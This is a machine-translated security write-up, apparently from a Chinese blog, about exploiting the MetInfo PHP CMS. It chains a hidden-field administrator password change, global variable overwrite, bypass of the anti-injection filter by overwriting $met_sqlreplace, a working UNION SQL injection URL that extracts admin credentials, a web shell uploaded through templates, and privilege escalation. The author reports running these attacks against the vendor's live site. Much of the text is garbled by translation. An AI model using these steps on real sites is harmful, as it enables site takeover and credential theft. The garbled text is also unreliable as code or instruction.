MetInfo global variable overwrite alternative breakthrough anti-Injection

PrefaceFor mature cms, SQL inject, and xss, all have their own defense code. However, some logic errors and misunderstandings may make system defense as a false one, this article is a case that uses global variables to cover multiple security defects caused by injection prevention and other logic errors in the MetInfo enterprise website management system.Front-end logic defect second change administrator password

 
MetInfo is a widely used enterprise management system in China and adopts the PHP + Mysql architecture. The bird installation is performed by the Administrator and the front-end members in one table at a time, which is much more convenient. register an ordinary member and view the source code. There is a hidden field, and there is a ghost in the visual test. Continue to trace to save. php if ($ action = "editor") {$ query = "update $ met_admin_table SET admin_id = '$ useid ',... = ......, If ($ pass1) {$ pass1 = md5 ($ pass1); $ query. = ", admin_pass = '$ pass1'";} $ query. = "where admin_id = '$ useid'"; $ db-> query ($ query); okinfo ('basic. php? Lang = '. $ lang, $ lang_js21);} check that the red code $ useid is the hidden field (which will be discussed later). It is not harmful to all user input, how can I use the conditions for updating the information? That is to say, the administrator password can be changed as long as the Administrator name is known. How can I know the Administrator name. Admin? Social engineering? Brute force? Let's continue reading...Global variable OverwriteInclude \ common. inc. php is the core file of the entire system. The user processes data and connects to the database. A piece of cool-like Code leads to global variable overwrites for international problems. Foreach (array ('_ cookies',' _ Post', '_ get') as $ _ request) {foreach ($ _ request as $ _ key = >$ _ value) {$ _ key {0 }! = '_' & $ _ Key = daddslashes ($ _ value) ;}} next, find the available places, preferably getShell or something. After searching for a long time, I found that all the variables passed in by database operations were commented out in single quotes, and I was no longer found in the background. <? Php # MetInfo Enterprise Content Management System # Copyright (C) MetInfo Co., Ltd ( http://www.metinfo.cn ). All rights reserved. require_once '.. /include/common. inc. php '; if ($ class1) $ id = $ class1; $ job = $ db-> get_one ("select * from $ met_job where id =' $ id '"); if (! $ Job) {okinfo ($ id single quotation mark bird, then overwrite $ met_job directly. Isn't it enough !! http://www.bkjia.com /Coder/minfo/job/showjob. php? Id = 1 & met_job = % 60information_schema % 60.% 60 SCHEMATA % 60% 23 access is normal, it means there is something wrong with it, it's crazy injection... Union query. Prevention of yarn injection ....Anti-injection is a float cloudLet's take a look at the anti-injection code global $ met_sqlreplace; if ($ met_sqlreplace) {$ string = str_replace ("select", "\ sel \ ect", $ string ); $ string = str_replace ("insert", "\ ins \ ert", $ string); $ string = str_replace ("update", "\ up \ date", $ string ); $ string = str_replace ("delete", "\ de \ lete", $ string); $ string = str_replace ("union", "\ un \ ion", $ string ); $ string = str_replace ("into", "\ in \ to", $ string); $ string = str_replace ("load _ File "," \ load \ _ \ file ", $ string); $ string = str_replace (" outfile "," \ out \ file ", $ string );} else {if (inject_check ($ string) {$ reurl = "http ://". $ _ SERVER ["HTTP_HOST"]; echo ("<script type = 'text/javascript '> alert ('Please Stop SQL Injecting! '); Location. href =' $ reurl'; </script> "); die (" Please Stop SQL Injecting! ") ;}} Follow up with the inject_check function, function inject_check ($ SQL _str) {if (strtoupper ($ SQL _str) =" UPDATETIME ") {return eregi ('select | insert | delete | \ '| \/\ * | \. \. \/| \. \/| union | into | load_file | outfile ', $ SQL _str );} else {return eregi ('select | insert | update | delete | \ '| \/\ * | \. \. \/| \. \/| union | into | load_file | outfile ', $ SQL _str) ;}}it seems that Xiaotao's shoes have also sent a discussion post about this function in 90sec... Regular Expression writing is comprehensive, and it is difficult to break through. However, we have the global variables mentioned above, and inject_check is full of cloud, floating cloud ..., when $ met_sqlreplace is set to true, the SQL statement check is not executed. We will overwrite $ met_sqlreplace and directly go to the jb official website for demonstration. http://www.metinfo.cn/demo/job/showjob.php?id=1&met_job=met_job Where id = 2 and 1 = 2 union select 1, (SELECT admin_id FROM 'Met _ admin_table 'where id = 1), 3, (SELECT admin_pass FROM 'Met _ admin_table 'where id = 1), 15%, password. I am too lazy to break the password. I have an administrator account and can change the password in seconds. The background simply uses shell to find the template for packaging and uploading, and directly accesses the trojan file. http://www.av.com/ Templates/test/ya. php

 Go back to the official website to raise the right to win shellI ran to the official website to test my ass and found the tragic bird... I am under a lot of pressure to limit my permissions on the official website... The submitted file is save. php. Check the key code if ($ editorpass! = 1) {$ query. = ", langok = '$ langok'"; $ query. = ", admin_type = '$ admin_type'"; $ query. = ", admin_issueok = '$ admin_issueok'"; $ query. = ", admin_op = '$ admin_op'";} sets editorpass to 0 and increases admin_type. The template is uploaded to the shell and a txt file is provided to commemorate it.